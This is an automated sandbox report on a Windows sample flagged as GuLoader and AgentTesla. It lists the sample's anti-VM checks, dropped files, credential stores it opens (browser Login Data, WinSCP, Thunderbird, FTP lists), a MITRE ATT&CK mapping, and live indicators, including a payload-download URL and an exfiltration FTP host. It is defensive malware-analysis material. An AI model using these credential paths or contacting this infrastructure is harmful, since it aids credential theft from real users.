Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Awb 4586109146.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.3699835222.0000000007EAE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: 0_2_73961B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73961B5F

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: 6_2_00150C77 push edi; retf

6_2_00150C7A

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	API/Special instruction interceptor: Address: 86D827C
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	API/Special instruction interceptor: Address: 5BB827C

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	RDTSC instruction interceptor: First address: 869C7C3 second address: 869C7C3 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, FFFFFFB2h 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FA3A4B1C297h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	RDTSC instruction interceptor: First address: 5B7C7C3 second address: 5B7C7C3 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, FFFFFFB2h 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FA3A4B646C7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Memory allocated: 36990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Memory allocated: 367A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059CC
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_004065FD FindFirstFileW,FindClose,	0_2_004065FD
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_00402868 FindFirstFileW,	6_2_00402868
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_004059CC
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_004065FD FindFirstFileW,FindClose,	6_2_004065FD

Source: Awb 4586109146.bat.exe, 00000006.00000002.3887463994.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, Awb 4586109146.bat.exe, 00000006.00000002.3887463994.00000000064FD000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	API call chain: ExitProcess graph end node			graph_0-4277
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	API call chain: ExitProcess graph end node			graph_0-4431

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,

0_2_00401E49

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: 0_2_73961B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73961B5F

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Process created: C:\Users\user\Desktop\Awb 4586109146.bat.exe "C:\Users\user\Desktop\Awb 4586109146.bat.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Queries volume information: C:\Users\user\Desktop\Awb 4586109146.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040338F

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb 4586109146.bat.exe PID: 2884, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb 4586109146.bat.exe PID: 2884, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb 4586109146.bat.exe PID: 2884, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	2 OS Credential Dumping	311 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	12 Virtualization/Sandbox Evasion	1 Credentials in Registry	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	2 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	226 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Awb 4586109146.bat.exe	17%	Virustotal		Browse
Awb 4586109146.bat.exe	11%	ReversingLabs
Awb 4586109146.bat.exe	100%	Avira	HEUR/AGEN.1338455

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://84.38.133.48/wlSTiHSjDLYgnyIzSMV100.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.ipify.org	104.26.13.205	true	false	high
concaribe.com	192.185.13.234	true	true	unknown
ftp.concaribe.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://84.38.133.48/wlSTiHSjDLYgnyIzSMV100.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.ipify.org	Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	Awb 4586109146.bat.exe	false	high
https://api.ipify.org/t	Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.38.133.48	unknown	Latvia		203557	DATACLUB-NL	false
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577288
Start date and time:	2024-12-18 11:03:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Awb 4586109146.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/10@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 135 Number of non-executed functions: 61
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Awb 4586109146.bat.exe, PID 2884 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.38.133.48	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.48/TeoRHdGgbvsSqoRyBIQpbDk31.bin
104.26.13.205	BiXS3FRoLe.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	lEUy79aLAW.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	winws1.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	KASHI SHIP PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	PO.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	rDOC24INV0616.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	PqCznDthHP.exe	Get hash	malicious	Edge Stealer	Browse	104.26.13.205
	https://www.canva.com/design/DAGZLdpMEGI/O58JBUDFuRvFcdZ0tgIwgA/edit?utm_content=DAGZLdpMEGI&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	duschno.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DATACLUB-NL	PO.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.133
	ODjwCjQBAP.exe	Get hash	malicious	GuLoader	Browse	84.38.129.16
	ODjwCjQBAP.exe	Get hash	malicious	GuLoader	Browse	84.38.129.16
	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.48
	u9aPQQIwhj.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.42
	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.42
	QUOTE #46789_AL_JAMEELA24.exe	Get hash	malicious	Remcos, GuLoader	Browse	84.38.133.160
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	84.38.129.16
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.129.16
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	185.29.11.116
CLOUDFLARENETUS	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	172.64.41.3
	https://2024sharepointonline.z28.web.core.windows.net/	Get hash	malicious	Unknown	Browse	104.16.20.118
	https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPy	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	172.64.41.3
	http://efaktura.dhlecommerce.pl	Get hash	malicious	Unknown	Browse	104.18.86.42
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	104.16.123.96
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	sldkjgsdGarDe3.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	104.26.13.205
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.13.205
	x0EMKX5G1g.exe	Get hash	malicious	PureCrypter, PureLog Stealer	Browse	104.26.13.205
	sldkjgsdGarDe3.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.26.13.205
	jhsdfggga13.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.26.13.205
	Garsdgwqa13de.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.26.13.205
	x0EMKX5G1g.exe	Get hash	malicious	PureCrypter, PureLog Stealer	Browse	104.26.13.205
	twjMb9cX64.exe	Get hash	malicious	Sliver	Browse	104.26.13.205
	WOlxr4yjgF.exe	Get hash	malicious	Sliver	Browse	104.26.13.205
	credit.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS	Browse	104.26.13.205

Dropped Files

